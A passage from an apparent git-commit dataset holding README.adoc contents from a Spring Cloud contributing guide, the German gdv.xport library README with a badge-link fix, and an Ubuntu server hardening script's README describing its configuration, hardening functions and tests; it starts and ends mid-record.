Click Apply and\nthen OK to save the preference changes.\n\nNOTE: Alternatively you can copy the repository settings from https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/.settings.xml[`.settings.xml`] into your own `~\/.m2\/settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n==== Adding Project Lombok Agent\n\nSpring Cloud uses http:\/\/projectlombok.org\/features\/index.html[Project Lombok]\nto generate getters and setters etc. Compiling from the command line this\nshouldn't cause any problems, but in an IDE you need to add an agent\nto the JVM. Full instructions can be found in the Lombok website. The\nsign that you need to do this is a lot of compiler errors to do with\nmissing methods and fields, e.g.\n\n[indent=0]\n----\nThe method getInitialStatus() is undefined for the type EurekaInstanceConfigBean EurekaDiscoveryClientConfiguration.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 120 Java Problem\nThe method getInitialStatus() is undefined for the type EurekaInstanceConfigBean EurekaDiscoveryClientConfiguration.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 121 Java Problem\nThe method setNonSecurePort(int) is undefined for the type EurekaInstanceConfigBean EurekaDiscoveryClientConfiguration.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 112 Java Problem\nThe type EurekaInstanceConfigBean.IdentifyingDataCenterInfo must implement the inherited abstract method DataCenterInfo.getName() EurekaInstanceConfigBean.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 131 Java Problem\nThe method getId() is undefined for the type ProxyRouteLocator.ProxyRouteSpec PreDecorationFilter.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/zuul\/filters\/pre line 60 Java Problem\nThe method getLocation() is undefined for the type ProxyRouteLocator.ProxyRouteSpec PreDecorationFilter.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/zuul\/filters\/pre line 55 Java Problem\n----\n\n==== Importing into Intellij\nSpring Cloud projects use annotation processing, particularly Lombok, which requires configuration\nor you will encounter compile problems. It also needs a specific version of maven and a profile\nenabled. Intellij 14.1+ requires some configuration to ensure these are setup properly.\n\n 1. Click Preferences, Plugins. *Ensure Lombok is installed*\n 2. Click New, Project from Existing Sources, choose your spring-cloud-sleuth directory\n 3. Choose Maven, and select Environment Settings. *Ensure you are using Maven 3.3.3*\n 4. In the next screen, *Select the profile `spring`* click Next until Finish.\n 5. Click Preferences, \"Build, Execution, Deployment\", Compiler, Annotation Processors. *Click Enable Annotation Processing*\n 6. Click Build, Rebuild Project, and you are ready to go!\n\n==== Importing into other IDEs\nMaven is well supported by most Java IDEs. Refer to you vendor documentation.\n\n\n== Contributing\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/support.springsource.com\/spring_committer_signup[contributor's agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/spring-cloud-build\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. If using IntelliJ, you can use the\n http:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files to have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project)\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow http:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb3a074243776c758e2200baf071c65abdad6fe9","subject":"badge links corrected","message":"badge links corrected\n","repos":"oboehm\/gdv.xport,oboehm\/gdv.xport,oboehm\/gdv.xport","old_file":"README.adoc","new_file":"README.adoc","new_contents":"https:\/\/maven-badges.herokuapp.com\/maven-central\/com.github.oboehm\/gdv-xport[image:https:\/\/maven-badges.herokuapp.com\/maven-central\/com.github.oboehm\/gdv-xport\/badge.svg[Maven Metadata]]\nhttps:\/\/travis-ci.org\/oboehm\/gdv.xport[image:https:\/\/api.travis-ci.org\/oboehm\/gdv.xport.svg?branch=develop\/3.x[BuildStatus]]\nhttps:\/\/coveralls.io\/github\/oboehm\/gdv.xport[image:https:\/\/coveralls.io\/repos\/github\/oboehm\/gdv.xport\/badge.svg?branch=develop%2F3.x[Coverage Status]]\nhttp:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[image:https:\/\/img.shields.io\/badge\/license-Apache%202.0-blue.svg[Apache License 2.0]]\n\n\n\n= Was ist gdv.xport?\n\ngdv.xport ist als Java-Bibliothek gestartet, die den Umgang mit dem GDV-Format erleichtert. \nDas \"x\" in port steht fur \"im\"- und \"ex\"-port. Die Bibliothek ist Open Source und steht unter der Apache License. \n\nMit Version 3.0 gibt es neben dieser Bibliothek auch REST-Services fuer Dateien im GDV-Format. \nDie einzelnen Module sind: \n\n* *gdv-xport-lib*: gdv.xport als Java-Bibliothek\n* *gdv-xport-service*: gdv.xport-Services (Spring-Boot-Anwendung)\n\n\n\n== Kompatibilitaet von v2 zu v3\n\nWaehrend Version 2 auf der 2013er-Version der XML-Datei von \"gdv-online\":http:\/\/www.gdv-online.de\/vuvm\/index.htm basiert,\nwurde Version 3 auf die aktuelle Version von 2015 aktualisiert.\nDiese Aenderungen sind aber abwaertskompatibel.\nAllerdings wurde mit der Aktualisierung auch die Bezeichner-Klasse ueberarbeitet:\n\n* die String-Konstanten \"NAME_xxx\", die als _@Deprecated_ waren, wurden entfernt,\n* die Bezeichner-Konstanten wurden geprueft, Schreibfehler entfernt und doppelte Eintraege entfernt,\n* verwaiste Konstanten, die in der XML-Datei nicht vorhanden sind, wurden entfernt.\n\nDadurch kann es sein, dass manche Konstanten irrtuemlich geloescht wurden.\nSollte dies der Fall sein, ein \"Issue\":https:\/\/github.com\/oboehm\/gdv.xport\/issues\/ erstellen.\nMan kann natuerlich auch die Konstanten in seiner Anwendung selber definieren.\n\n\n\n== Aehnliche Projekte\n\nFuer Ruby gibt es \"OpenGDV\":https:\/\/github.com\/vendis\/opengdv\/, einer Open-Source-Bibliothek, die unter der MIT-License steht.\nAllerdings wurde diese Bibliothek schon seit laengerer Zeit nicht mehr aktualisiert.\n\n\n\n== GIT Branching-Modell\n\nEntwickelt wird nach \"A successful Git branching model\":http:\/\/nvie.com\/posts\/a-successful-git-branching-model\/ von Vincent Driessen.\nDie Weiterentwicklung der aktuellen Version findet auf dem develop-Branch statt (derzeit: \"develop\/3.x\":https:\/\/github.com\/oboehm\/gdv.xport\/tree\/develop\/3.x), waehrend das letzte Release im Release-Zweig (derzeit: \"release\/3.x\":https:\/\/github.com\/oboehm\/gdv.xport\/tree\/release\/3.x) zu finden ist.\n\n\n\n== Weitere Infos\n\nIm \"Wiki\":https:\/\/github.com\/oboehm\/gdv.xport\/wiki ist alles Wichtige zu gdv.xport zusammengefasst.\nWeitere Infos wie z.B. die \"JavaDocs\":http:\/\/www.aosd.de\/gdv.xport\/apidocs\/index.html finden Sie auch auf der \"Maven Projekt-Seite\":http:\/\/www.aosd.de\/gdv.xport\/ .\n\n* CI-Build: https:\/\/travis-ci.org\/oboehm\/gdv.xport\n* Wiki: https:\/\/github.com\/oboehm\/gdv.xport\/wiki\n* Projekt-Seite: http:\/\/www.aosd.de\/gdv.xport\/\n","old_contents":"image:https:\/\/maven-badges.herokuapp.com\/maven-central\/com.github.oboehm\/gdv-xport\/badge.svg[Maven metadata URI]\nimage:https:\/\/api.travis-ci.org\/oboehm\/gdv.xport.svg?branch=develop\/3.x[BuildStatus]\nimage:https:\/\/coveralls.io\/repos\/github\/oboehm\/gdv.xport\/badge.svg?branch=develop%2F3.x[Coverage Status]\nimage:https:\/\/img.shields.io\/badge\/license-Apache%202.0-blue.svg[Apache License 2.0]\n\n\n\n= Was ist gdv.xport?\n\ngdv.xport ist als Java-Bibliothek gestartet, die den Umgang mit dem GDV-Format erleichtert. \nDas \"x\" in port steht fur \"im\"- und \"ex\"-port. Die Bibliothek ist Open Source und steht unter der Apache License. \n\nMit Version 3.0 gibt es neben dieser Bibliothek auch REST-Services fuer Dateien im GDV-Format. \nDie einzelnen Module sind: \n\n* *gdv-xport-lib*: gdv.xport als Java-Bibliothek\n* *gdv-xport-service*: gdv.xport-Services (Spring-Boot-Anwendung)\n\n\n\n== Kompatibilitaet von v2 zu v3\n\nWaehrend Version 2 auf der 2013er-Version der XML-Datei von \"gdv-online\":http:\/\/www.gdv-online.de\/vuvm\/index.htm basiert,\nwurde Version 3 auf die aktuelle Version von 2015 aktualisiert.\nDiese Aenderungen sind aber abwaertskompatibel.\nAllerdings wurde mit der Aktualisierung auch die Bezeichner-Klasse ueberarbeitet:\n\n* die String-Konstanten \"NAME_xxx\", die als _@Deprecated_ waren, wurden entfernt,\n* die Bezeichner-Konstanten wurden geprueft, Schreibfehler entfernt und doppelte Eintraege entfernt,\n* verwaiste Konstanten, die in der XML-Datei nicht vorhanden sind, wurden entfernt.\n\nDadurch kann es sein, dass manche Konstanten irrtuemlich geloescht wurden.\nSollte dies der Fall sein, ein \"Issue\":https:\/\/github.com\/oboehm\/gdv.xport\/issues\/ erstellen.\nMan kann natuerlich auch die Konstanten in seiner Anwendung selber definieren.\n\n\n\n== Aehnliche Projekte\n\nFuer Ruby gibt es \"OpenGDV\":https:\/\/github.com\/vendis\/opengdv\/, einer Open-Source-Bibliothek, die unter der MIT-License steht.\nAllerdings wurde diese Bibliothek schon seit laengerer Zeit nicht mehr aktualisiert.\n\n\n\n== GIT Branching-Modell\n\nEntwickelt wird nach \"A successful Git branching model\":http:\/\/nvie.com\/posts\/a-successful-git-branching-model\/ von Vincent Driessen.\nDie Weiterentwicklung der aktuellen Version findet auf dem develop-Branch statt (derzeit: \"develop\/3.x\":https:\/\/github.com\/oboehm\/gdv.xport\/tree\/develop\/3.x), waehrend das letzte Release im Release-Zweig (derzeit: \"release\/3.x\":https:\/\/github.com\/oboehm\/gdv.xport\/tree\/release\/3.x) zu finden ist.\n\n\n\n== Weitere Infos\n\nIm \"Wiki\":https:\/\/github.com\/oboehm\/gdv.xport\/wiki ist alles Wichtige zu gdv.xport zusammengefasst.\nWeitere Infos wie z.B. die \"JavaDocs\":http:\/\/www.aosd.de\/gdv.xport\/apidocs\/index.html finden Sie auch auf der \"Maven Projekt-Seite\":http:\/\/www.aosd.de\/gdv.xport\/ .\n\n* CI-Build: https:\/\/travis-ci.org\/oboehm\/gdv.xport\n* Wiki: https:\/\/github.com\/oboehm\/gdv.xport\/wiki\n* Projekt-Seite: http:\/\/www.aosd.de\/gdv.xport\/\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51f3350bda84c357d34b94b81355840a09d547bd","subject":"update README","message":"update README\n\nSigned-off-by: Thomas Sj\u00f6gren <9ff28d1cb1d19283ed3327b40df6c7d62d8bc343@users.noreply.github.com>\n","repos":"konstruktoid\/hardening,konstruktoid\/hardening","old_file":"README.adoc","new_file":"README.adoc","new_contents":"image::logo\/horizontal.png[Ubuntu Hardening]\n\n= Hardening Ubuntu. Systemd edition.\n:icons: font\n\nA quick way to make a Ubuntu server a bit more secure.\n\nTested on `Ubuntu 20.04 Focal Fossa` and `Ubuntu 20.10 Groovy Gorilla (development branch)`.\n\nSystemd required.\n\nIf you're just interested in the security focused systemd configuration, it's\navailable as a link:systemd.adoc[separate document].\n\nIf you're interested in testing your host settings, you'll find the\nlink:README.adoc#tests[instructions here].\n\nNOTE: This is a constant work in progress. Make sure you understand what it\ndoes. `Read the code`.\n\n== Howto\nStart the installation of the server. +\nPick language, keyboard layout, timezone and so on as you usually would.\n\n=== Partition the system\n[source,shell]\n----\n\/\n\/boot (rw)\n\/home (rw,nosuid,nodev)\nswap\n\/var\n\/var\/log (rw,nosuid,nodev,noexec)\n\/var\/log\/audit (rw,nosuid,nodev,noexec)\n\/var\/tmp (rw,noexec,nodev,nosuid)\n----\n\nNote that `\/tmp` will be added automatically by the script.\n\n=== Login, set a Grub2 password, configure and run ubuntu.sh\nDo not add any packages. +\nLog in. +\nSelect a Grub2 password with `grub-mkpasswd-pbkdf2`. +\nDownload the script: `git clone https:\/\/github.com\/konstruktoid\/hardening.git`. +\nChange the configuration options in the `ubuntu.cfg` file. +\nRun the script: `sudo bash ubuntu.sh`. +\nReboot.\n\nIf possible, use the newly installed and configured system as a reference,\nor golden, image. Use that image as a baseline installation media and ensure\nthat any future installation comply with benchmarks and policies using a\nconfiguration management tool, e.g https:\/\/www.ansible.com\/[Ansible] or\nhttps:\/\/puppet.com\/[Puppet].\n\nIf you're using Ansible, a playbook with most of the functions in this script is\navailable in my Ansible repository https:\/\/github.com\/konstruktoid\/ansible-role-hardening[konstruktoid\/ansible-role-hardening].\n\n== Configuration options\n[source,shell]\n----\nFW_ADMIN='127.0.0.1' \/\/ <1>\nSSH_GRPS='sudo' \/\/ <2>\nSSH_PORT='22' \/\/ <3>\nSYSCTL_CONF='.\/misc\/sysctl.conf' \/\/ <4>\nAUDITD_MODE='1' \/\/ <5>\nAUDITD_RULES='.\/misc\/audit-base.rules .\/misc\/audit-aggressive.rules .\/misc\/audit-docker.rules' \/\/ <6>\nLOGROTATE_CONF='.\/misc\/logrotate.conf' \/\/ <7>\nNTPSERVERPOOL='0.ubuntu.pool.ntp.org 1.ubuntu.pool.ntp.org 2.ubuntu.pool.ntp.org 3.ubuntu.pool.ntp.org pool.ntp.org' \/\/ <8>\nTIMEDATECTL='' \/\/ <9>\nVERBOSE='N' \/\/ <10>\nAUTOFILL='N' \/\/ <11>\nCHANGEME='' \/\/ <12>\n\n# Configuration files\nADDUSER='\/etc\/adduser.conf'\nAUDITDCONF='\/etc\/audit\/auditd.conf'\nAUDITRULES='\/etc\/audit\/rules.d\/hardening.rules'\nCOMMONPASSWD='\/etc\/pam.d\/common-password'\nCOMMONACCOUNT='\/etc\/pam.d\/common-account'\nCOMMONAUTH='\/etc\/pam.d\/common-auth'\nCOREDUMPCONF='\/etc\/systemd\/coredump.conf'\nDEFAULTGRUB='\/etc\/default\/grub.d'\nDISABLEFS='\/etc\/modprobe.d\/disablefs.conf'\nDISABLEMOD='\/etc\/modprobe.d\/disablemod.conf'\nDISABLENET='\/etc\/modprobe.d\/disablenet.conf'\nJOURNALDCONF='\/etc\/systemd\/journald.conf'\nLIMITSCONF='\/etc\/security\/limits.conf'\nLOGINDCONF='\/etc\/systemd\/logind.conf'\nLOGINDEFS='\/etc\/login.defs'\nLOGROTATE='\/etc\/logrotate.conf'\nPAMLOGIN='\/etc\/pam.d\/login'\nRESOLVEDCONF='\/etc\/systemd\/resolved.conf'\nRKHUNTERCONF='\/etc\/default\/rkhunter'\nRSYSLOGCONF='\/etc\/rsyslog.conf'\nSECURITYACCESS='\/etc\/security\/access.conf'\nSSHFILE='\/etc\/ssh\/ssh_config'\nSSHDFILE='\/etc\/ssh\/sshd_config'\nSYSCTL='\/etc\/sysctl.conf'\nSYSTEMCONF='\/etc\/systemd\/system.conf'\nTIMESYNCD='\/etc\/systemd\/timesyncd.conf'\nUFWDEFAULT='\/etc\/default\/ufw'\nUSERADD='\/etc\/default\/useradd'\nUSERCONF='\/etc\/systemd\/user.conf'\n----\n<1> The IP addresses that will be able to connect with SSH, separated by spaces.\n<2> Which group the users have to be member of in order to acess via SSH, separated by spaces.\n<3> Configure SSH port.\n<4> Stricter sysctl settings.\n<5> Auditd failure mode. 0=silent 1=printk 2=panic.\n<6> Auditd rules.\n<7> Logrotate settings.\n<8> NTP server pool.\n<9> Add a specific time zone or use the system default by leaving it empty.\n<10> If you want all the details or not.\n<11> Let the script guess the `FW_ADMIN` and `SSH_GRPS` settings.\n<12> Add something just to verify that you actually glanced the code.\n\n== Functions\n\n=== Function list\n\n==== 01_pre\nSetup script, sets APT flags and permission checks.\n\n==== 02_firewall\nEnable `ufw`, use `\/etc\/sysctl.conf`, and allow port 22 from `$FW_ADMIN`.\n\n==== 03_disablenet\nDisable `dccp` `sctp` `rds` `tipc` protocols.\n\n==== 04_disablemnt\nDisable `cramfs` `freevxfs` `jffs2` `hfs` `hfsplus` `squashfs` `udf` `vfat` file\nsystems.\n\n==== 05_systemdconf\nDisable coredumps and crash shells, set `DefaultLimitNOFILE` and\n`DefaultLimitNPROC` to 1024.\n\n==== 06_journalctl\nCompress logs, forward to syslog and make log storage persistent. Ensure rsyslog\nwrites logs with stricter permissions.\n\n==== 07_timesyncd\nAdd four NTP-servers with a latency < 50ms from `$NTPSERVERPOOL`.\n\n==== 08_fstab\nConfigure `\/tmp\/` and `\/var\/tmp\/`. Remove floppy drivers from `\/etc\/fstab`\nand add `hidepid=2` to `\/proc`.\n\n==== 09_prelink\nUndo prelinking, and remove `prelink` package.\n\n==== 10_aptget\nConfigure `dpkg` and `apt-get`. `apt-get` update and upgrade.\n\n==== 11_hosts\n`\/etc\/hosts.allow` and `\/etc\/hosts.deny` restrictions.\n\n==== 12_logindefs\nModify `\/etc\/login.defs`, e.g. `UMASK`, password age limits and\n`SHA_CRYPT_MAX_ROUNDS`.\n\n==== 13_sysctl\nUpdate `$SYSCTL` with `$SYSCTL_CONF`.\n\n==== 14_limits\nSet hard and soft limits.\n\n==== 15_adduser\nConfigure `useradd` and `adduser` to set `\/bin\/false` as default shell,\nhome directory permissions to `0750` and lock users 30 days after password\nexpires.\n\n==== 16_rootaccess\nLimit `\/etc\/securetty` to `console`, and `root` from 127.0.0.1 in\n`\/etc\/security\/access.conf`.\n\n==== 17_packages\nInstalls `acct` `aide-common` `apparmor-profiles` `apparmor-utils` `auditd`\n`audispd-plugins` `debsums` `gnupg2` `haveged` `libpam-apparmor`\n`libpam-cracklib` `libpam-tmpdir` `needrestart` `openssh-server` `postfix`\n`rkhunter` `sysstat` `systemd-coredump` `tcpd` `update-notifier-common`\n`vlock`.\n\nRemoves `apport*` `autofs` `avahi*` `beep` `git` `pastebinit`\n`popularity-contest` `rsh*` `rsync` `talk*` `telnet*` `tftp*` `whoopsie`\n`xinetd` `yp-tools` `ypbind`.\n\n==== 18_sshdconfig\nConfigure the `OpenSSH`-daemon.\n\n==== 19_password\nConfigure `pam_cracklib.so` and `pam_tally2.so`.\n\n==== 20_cron\nAllow `root` to use `cron`. Mask `atd`.\n\n==== 21_ctraltdel\nDisable Ctrl-alt-delete.\n\n==== 22_auditd\nConfigure `auditd`, use `$AUDITD_RULES` and set failure mode `$AUDITD_MODE`.\n\n==== 23_disablemod\nDisable `bluetooth` `bnep` `btusb` `cpia2` `firewire-core` `floppy` `n_hdlc`\n`net-pf-31` `pcspkr` `soundcore` `thunderbolt` `usb-midi` `usb-storage`\n`uvcvideo` `v4l2_common` kernel modules.\n\nNote that disabling the `usb-storage` will disable any usage of USB storage\ndevices, if such devices are needed `USBGuard` should be configured accordingly.\n\n==== 24_aide\nConfigure `aide`.\n\n==== 25_rhosts\nRemove `hosts.equiv` and `.rhosts`.\n\n==== 26_users\nRemove `games` `gnats` `irc` `list` `news` `sync` `uucp` users.\n\n==== 27_suid\nRemove `suid` bits from the executables listed in\nlink:misc\/suid.list[this document].\n\n==== 28_umask\nSet `bash` and `\/etc\/profile` umask.\n\n==== 29_apparmor\nEnforce present `apparmor` profiles.\n\n==== 30_path\nSet `root` path to `\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin`,\nand user path to `\/usr\/local\/bin:\/usr\/bin:\/bin`.\n\n==== 31_logindconf\nConfigure `systemd\/logind.conf` and use `KillUserProcesses`.\n\n==== 32_resolvedconf\nConfigure `systemd\/resolved.conf`.\n\n==== 33_rkhunter\nConfigure `rkhunter`.\n\n==== 34_issue\nUpdate `\/etc\/issue` `\/etc\/issue.net` `\/etc\/motd`.\n\n==== 35_apport\nDisable `apport`, `ubuntu-report` and `popularity-contest`.\n\n==== 36_lockroot\nLock the `root` user account.\n\n==== 37_coredump\nDisable coredumps with `systemd\/coredump.conf`.\n\n==== 38_postfix\nDisable the `VRFY` command, configure `smtpd_banner`, `smtpd_client_restrictions`\nand `inet_interfaces`.\n\n==== 39_motdnews\nDisable `motd-news`.\n\n==== 40_usbguard\nInstall and configure `usbguard`.\n\n==== 41_compilers\nRestrict compiler access.\n\n==== 42_kernel\nSet `lockdown=confidentiality` if `\/sys\/kernel\/security\/lockdown` is present.\n\n==== 43_sudo\nConfigure `sudo` with `use_pty`, `logfile`, `!visiblepw`, `!pwfeedback`,\n`passwd_timeout` and `timestamp_timeout`.\n\nRestrict `su` to the `sudo` group.\n\n==== 98_systemddelta\nIf verbose, show `systemd-delta`.\n\n==== 99_post\nEnsure `secureboot-db` is installed, update grub and ensure strict permissions\non boot files.\n\n==== 99_reboot\nPrint if a reboot is required.\n\n=== Function execution order\n[source,shell]\n----\nf_pre\nf_kernel\nf_firewall\nf_disablenet\nf_disablefs\nf_disablemod\nf_systemdconf\nf_resolvedconf\nf_logindconf\nf_journalctl\nf_timesyncd\nf_fstab\nf_prelink\nf_aptget_configure\nf_aptget\nf_hosts\nf_issue\nf_sudo\nf_logindefs\nf_sysctl\nf_limitsconf\nf_adduser\nf_rootaccess\nf_package_install\nf_coredump\nf_usbguard\nf_postfix\nf_apport\nf_motdnews\nf_rkhunter\nf_sshconfig\nf_sshdconfig\nf_password\nf_cron\nf_ctrlaltdel\nf_auditd\nf_aide\nf_rhosts\nf_users\nf_lockroot\nf_package_remove\nf_suid\nf_restrictcompilers\nf_umask\nf_path\nf_aa_enforce\nf_aide_post\nf_aide_timer\nf_aptget_noexec\nf_aptget_clean\nf_systemddelta\nf_post\nf_checkreboot\n----\n\n== Tests\nThere are approximately 700 https:\/\/github.com\/sstephenson\/bats[Bats tests]\nfor most of the above settings available in the link:tests\/[tests directory].\n\n[source,shell]\n----\nsudo apt-get -y install bats\ngit clone https:\/\/github.com\/konstruktoid\/hardening.git\ncd hardening\/tests\/\nsudo bats .\n----\n\n=== Test automation using Vagrant\nRunning `bash .\/runTests.sh` will use https:\/\/www.vagrantup.com\/[Vagrant] to run\nall above tests and https:\/\/github.com\/CISOfy\/Lynis[Lynis] on all supported Ubuntu\nversions. The script will generate a file named `TESTRESULTS.adoc`.\n\n=== Testing a host\nRunning `bash .\/runHostTests.sh`, located in the link:tests\/[tests directory],\nwill generate a `TESTRESULTS-<HOSTNAME>.adoc` report.\n\n=== OpenSCAP testing\nTo run a https:\/\/github.com\/ComplianceAsCode\/content[OpenSCAP] test on a\nUbuntu host, where `v0.1.49` should be replaced with the latest available\nversion:\n\n[source,shell]\n----\nsudo apt-get -y install libopenscap8 unzip\nwget https:\/\/github.com\/ComplianceAsCode\/content\/releases\/download\/v0.1.49\/scap-security-guide-0.1.49-oval-510.zip\nunzip scap-security-guide-0.1.49-oval-510.zip\ncd scap-security-guide-0.1.49-oval-5.10\noscap info --fetch-remote-resources .\/ssg-ubuntu1804-ds.xml\nsudo oscap xccdf eval --fetch-remote-resources \\\n --profile xccdf_org.ssgproject.content_profile_anssi_np_nt28_high \\\n --report ..\/bionic_stig-report.html .\/ssg-ubuntu1804-ds.xml\n----\n\n== Recommended reading\nhttps:\/\/public.cyber.mil\/stigs\/downloads\/?_dl_facet_stigs=operating-systems%2Cunix-linux[Canonical Ubuntu 18.04 LTS STIG - Ver 1, Rel 1] +\nhttps:\/\/www.cisecurity.org\/benchmark\/distribution_independent_linux\/[CIS Distribution Independent Linux Benchmark] +\nhttps:\/\/www.cisecurity.org\/benchmark\/ubuntu_linux\/[CIS Ubuntu Linux Benchmark] +\nhttps:\/\/www.ncsc.gov.uk\/collection\/end-user-device-security\/platform-specific-guidance\/ubuntu-18-04-lts[EUD Security Guidance: Ubuntu 18.04 LTS]\nhttps:\/\/public.cyber.mil\/stigs\/downloads\/?_dl_facet_stigs=operating-systems%2Cunix-linux[Red Hat Enterprise Linux 7 - Ver 2, Rel 3 STIG] +\nhttps:\/\/wiki.ubuntu.com\/Security\/Features +\nhttps:\/\/help.ubuntu.com\/community\/StricterDefaults +\n\n== Contributing\nDo you want to contribute? That's great! Contributions are always welcome,\nno matter how large or small. If you found something odd, feel free to\nhttps:\/\/github.com\/konstruktoid\/hardening\/issues\/[submit a new issue],\nimprove the code by https:\/\/github.com\/konstruktoid\/hardening\/pulls[creating a pull request],\nor by https:\/\/github.com\/sponsors\/konstruktoid[sponsoring this project].\n\nLogo by https:\/\/github.com\/reallinfo[reallinfo].\n","old_contents":"image::logo\/horizontal.png[Ubuntu Hardening]\n\n= Hardening Ubuntu. Systemd edition.\n:icons: font\n\nA quick way to make a Ubuntu server a bit more secure.\n\nTested on `Ubuntu 20.04 Focal Fossa` and `Ubuntu 20.10 Groovy Gorilla (development branch)`.\n\nSystemd required.\n\nIf you're just interested in the security focused systemd configuration, it's\navailable as a link:systemd.adoc[separate document].\n\nIf you're interested in testing your host settings, you'll find the\nlink:README.adoc#tests[instructions here].\n\nNOTE: This is a constant work in progress. Make sure you understand what it\ndoes. `Read the code`.\n\n== Howto\nStart the installation of the server. +\nPick language, keyboard layout, timezone and so on as you usually would.\n\n=== Partition the system\n[source,shell]\n----\n\/\n\/boot (rw)\n\/home (rw,nosuid,nodev)\nswap\n\/var\n\/var\/log (rw,nosuid,nodev,noexec)\n\/var\/log\/audit (rw,nosuid,nodev,noexec)\n\/var\/tmp (rw,noexec,nodev,nosuid)\n----\n\nNote that `\/tmp` will be added automatically by the script.\n\n=== Login, set a Grub2 password, configure and run ubuntu.sh\nDo not add any packages. +\nLog in. +\nSelect a Grub2 password with `grub-mkpasswd-pbkdf2`. +\nDownload the script: `git clone https:\/\/github.com\/konstruktoid\/hardening.git`. +\nChange the configuration options in the `ubuntu.cfg` file. +\nRun the script: `sudo bash ubuntu.sh`. +\nReboot.\n\nIf possible, use the newly installed and configured system as a reference,\nor golden, image. Use that image as a baseline installation media and ensure\nthat any future installation comply with benchmarks and policies using a\nconfiguration management tool, e.g https:\/\/www.ansible.com\/[Ansible] or\nhttps:\/\/puppet.com\/[Puppet].\n\nIf you're using Ansible, a playbook with most of the functions in this script is\navailable in my Ansible repository https:\/\/github.com\/konstruktoid\/ansible-role-hardening[konstruktoid\/ansible-role-hardening].\n\n== Configuration options\n[source,shell]\n----\nFW_ADMIN='127.0.0.1' \/\/ <1>\nSSH_GRPS='sudo' \/\/ <2>\nSSH_PORT='22' \/\/ <3>\nSYSCTL_CONF='.\/misc\/sysctl.conf' \/\/ <4>\nAUDITD_MODE='1' \/\/ <5>\nAUDITD_RULES='.\/misc\/audit-base.rules .\/misc\/audit-aggressive.rules .\/misc\/audit-docker.rules' \/\/ <6>\nLOGROTATE_CONF='.\/misc\/logrotate.conf' \/\/ <7>\nNTPSERVERPOOL='0.ubuntu.pool.ntp.org 1.ubuntu.pool.ntp.org 2.ubuntu.pool.ntp.org 3.ubuntu.pool.ntp.org pool.ntp.org' \/\/ <8>\nTIMEDATECTL='' \/\/ <9>\nVERBOSE='N' \/\/ <10>\nAUTOFILL='N' \/\/ <11>\nCHANGEME='' \/\/ <12>\n\n# Configuration files\nADDUSER='\/etc\/adduser.conf'\nAUDITDCONF='\/etc\/audit\/auditd.conf'\nAUDITRULES='\/etc\/audit\/rules.d\/hardening.rules'\nCOMMONPASSWD='\/etc\/pam.d\/common-password'\nCOMMONACCOUNT='\/etc\/pam.d\/common-account'\nCOMMONAUTH='\/etc\/pam.d\/common-auth'\nCOREDUMPCONF='\/etc\/systemd\/coredump.conf'\nDEFAULTGRUB='\/etc\/default\/grub.d'\nDISABLEFS='\/etc\/modprobe.d\/disablefs.conf'\nDISABLEMOD='\/etc\/modprobe.d\/disablemod.conf'\nDISABLENET='\/etc\/modprobe.d\/disablenet.conf'\nJOURNALDCONF='\/etc\/systemd\/journald.conf'\nLIMITSCONF='\/etc\/security\/limits.conf'\nLOGINDCONF='\/etc\/systemd\/logind.conf'\nLOGINDEFS='\/etc\/login.defs'\nLOGROTATE='\/etc\/logrotate.conf'\nPAMLOGIN='\/etc\/pam.d\/login'\nRESOLVEDCONF='\/etc\/systemd\/resolved.conf'\nRKHUNTERCONF='\/etc\/default\/rkhunter'\nRSYSLOGCONF='\/etc\/rsyslog.conf'\nSECURITYACCESS='\/etc\/security\/access.conf'\nSSHFILE='\/etc\/ssh\/ssh_config'\nSSHDFILE='\/etc\/ssh\/sshd_config'\nSYSCTL='\/etc\/sysctl.conf'\nSYSTEMCONF='\/etc\/systemd\/system.conf'\nTIMESYNCD='\/etc\/systemd\/timesyncd.conf'\nUFWDEFAULT='\/etc\/default\/ufw'